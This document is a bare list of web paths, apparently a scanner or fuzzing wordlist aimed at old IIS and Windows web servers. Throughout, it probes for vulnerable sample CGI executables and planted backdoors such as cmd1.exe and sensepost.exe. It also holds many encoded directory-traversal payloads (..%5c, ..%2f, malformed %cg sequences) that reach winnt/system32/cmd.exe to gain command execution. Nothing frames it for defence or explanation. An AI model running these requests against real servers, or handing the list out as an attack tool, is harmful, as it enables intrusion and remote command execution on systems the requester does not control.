/msadc/cmd.exe
/scripts/carello/add.exe
/scripts/clients.exe
/scripts/dnewsweb.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/login.exe
/scripts/visadmin.exe
/scripts/webbbs.exe
/users.exe
/wguest.exe
/msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/scripts/tools/mkilog.exe
/scripts/srchadm/webhits.exe
/scripts/perl.exe
/vti_cnf/cmd.exe
/vti_bin/cmd.exe
/cgi-bin/rguest.exe
/iisadmpwd/sensepost.exe
/servlet/servletrunner.exe
/_vti_pvt/shtml.exe
/cgi-bin/cgitest.exe
/cgi-bin/perl.exe
/cmd1.exe
/vti_bin/cmd1.exe
/cgi-bin/mailform.exe
/cgi-bin/ppdscgi.exe
/ovcgi/openview5.exe
/pass.exe
/passwords.exe
/samples/cmd1.exe
/samples/sensepost.exe
/scrips/tools/getdrvs.exe
/scripts/admin.exe
/scripts/fpadmcgi.exe
/scripts/fpsrvadm.exe
/scripts/lsass.exe
/scripts/minimal.exe
/scripts/rguest.exe
/servlet/jrun.exe
/vti_cnf/cmd1.exe
/exchange/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/scripts/..%s1%pc../winnt/system32/cmd.exe
/cgi-bin/gwweb.exe
/cgi-bin/redirect.exe
/clients.exe
/cmd32.exe
/iisadmpwd/cmd1.exe
/imagemap.exe
/msadc/cmd1.exe
/password.exe
/perl.exe
/php/php.exe
/scripts/c32web.exe
/scripts/cmd1.exe
/scripts/iisadmin/tools/dsnform.exe
/scripts/sensepost.exe
/scripts/wa.exe
/tools/newdsn.exe
/_mem_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/iissamples/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/msadc/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/admin.exe
/cgi-bin/cmd.exe
/cgi-bin/imagemap.exe
/cgi-bin/scripts/perl.exe
/cgi-bin/visitor.exe
/cgi-bin/webplus.exe
/cgi-bin/windmail.exe
/iisadmpwd/cmd.exe
/rguest.exe
/scrips/tools/newdsn.exe
/scripts/cmd.exe
/scripts/dnsform.exe
/scripts/get32.exe
/scripts/run.exe
/sensepost.exe
/store.exe
/uploads/crashBox.exe
/vti_cnf/sensepost.exe
/_vti_bin/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/scripts/..%t0%qf../winnt/system32/cmd.exe
/_vt_bin/fpremadm.exe
/cgi-bin/cgimail.exe
/cgi-bin/get32.exe
/cgi-bin/wguest.exe
/cmd.exe
/msadc/sensepost.exe
/officescan/cgi/jdkrqnotify.exe
/samples/search/webhits.exe
/scripts/cfgwiz.exe
/scripts/cgitest.exe
/scripts/fpcount.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/passwords.exe
/scripts/redir.exe
/scripts/testcgi.exe
/scripts/tools/getdrvrs.exe
/scripts/users.exe
/scripts/visitor.exe
/scripts/wguest.exe
/uploader.exe
/windmail.exe
/exchange/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/exchange/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/_vt_bin/cfgwiz.exe
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/_vti_bin/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/_vti_cnf/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/_vti_cnf/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/cgi-bin/changepw.exe
/cgi-bin/dbmlparser.exe
/cgi-bin/gw5/gwweb.exe
/login.exe
/samples/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/samples/cmd.exe
/script/tools/newdsn.exe
/scripts/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe
/scripts/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe
/scripts/%dg%7g%qe%dg%7g%qe/%dg%7g%qe%dg%7g%qe/winnt/system32/cmd.exe
/scripts/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe
/scripts/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe
/scripts/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/scripts/..%5c..%5cwinnt/system32/cmd.exe
/scripts/..%bg%9v../winnt/system32/cmd.exe
/scripts/..%bg%qf../winnt/system32/cmd.exe
/scripts/..%cg%qf../winnt/system32/cmd.exe
/scripts/..%ch%8s../winnt/system32/cmd.exe
/scripts/..%ch%pc../winnt/system32/cmd.exe
/scripts/..%s0%9v../winnt/system32/cmd.exe
/scripts/..%s0%qf../winnt/system32/cmd.exe
/scripts/..%s1%8s../winnt/system32/cmd.exe
/scripts/cmd32.exe
/scripts/dbmlparser.exe
/scripts/dmailweb.exe
/scripts/fpremadm.exe
/scripts/gupcgi.exe
/scripts/htimage.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/ppdscgi.exe
/scripts/store.exe
/scripts/tools/dsnform.exe
/scripts/tools/newdsn.exe
/servlet/serveletrunner.exe
/servlets/servletrunner.exe
/vti_bin/sensepost.exe
/_vti_bin/_vti_aut/author.exe
/_vti_bin/fpcount.exe
/aliredir.exe
/cart32.exe
/cgi-bin/CWMail.exe
/cgi-bin/GW/GWWEB.EXE
/cgi-bin/MailPost.exe
/cgi-bin/aliredir.exe
/cgi-bin/blat.exe
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/formvar.exe
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/get16.exe
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/lsin.exe
/cgi-bin/mailme.exe
/cgi-bin/mailmepro.exe
/cgi-bin/mailsend.exe
/cgi-bin/minimal.exe
/cgi-bin/post16.exe
/cgi-bin/postie.exe
/cgi-bin/redir.exe
/cgi-bin/test.exe
/cgi-bin/testcgi.exe
/cgi-bin/wsendmail.exe
/cgi-shl/win-c-sample.exe
/cgi-win/perl.exe
/cgi-win/rguest.exe
/cgi-win/wguest.exe
/cgi-win/wwwuploader.exe
/cgi/perl.exe
/cgi/rguest.exe
/cgi/wguest.exe
/cgiWebupdate.exe
/cgimail.exe
/db2_doc/html/db2srsen.exe
/get32.exe
/getdrvrs.exe
/imapcern.exe
/lsin.exe
/newdsn.exe
/post16.exe
/s97_cgi.exe
/scripts/../../cmd.exe
/scripts/CGImail.exe
/scripts/CWMail.exe
/scripts/GW5/GWWEB.EXE
/scripts/MailPost.exe
/scripts/blat.exe
/scripts/cart32.exe
/scripts/formvar.exe
/scripts/fpexplorer.exe
/scripts/imagemap.exe
/scripts/mailform.exe
/scripts/mailme.exe
/scripts/mailmepro.exe
/scripts/mailsend.exe
/scripts/postie.exe
/scripts/samples/search/webhits.exe
/scripts/test.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdns.exe
/scripts/toos/mkilog.exe
/scripts/uploader.exe
/scripts/webnews.exe
/scripts/webplus.exe
/scripts/win-c-sample.exe
/scripts/wsendmail.exe
/search/s97_cgi.exe
/search97/s97_cgi.exe
/servlets/jrun.exe
/shtml.exe
/stats/cgi-win/perl.exe
/visadmin.exe
/webfind.exe
/win-c-sample.exe
/cgi-win/uploader.exe
/cgi-bin/visadmin.exe
/cgi-bin/htimage.exe
/scripts/counter.exe
/cgi-bin/ceilidh.exe
/cgi-bin/post32.exe
/_vti_bin/shtml.exe
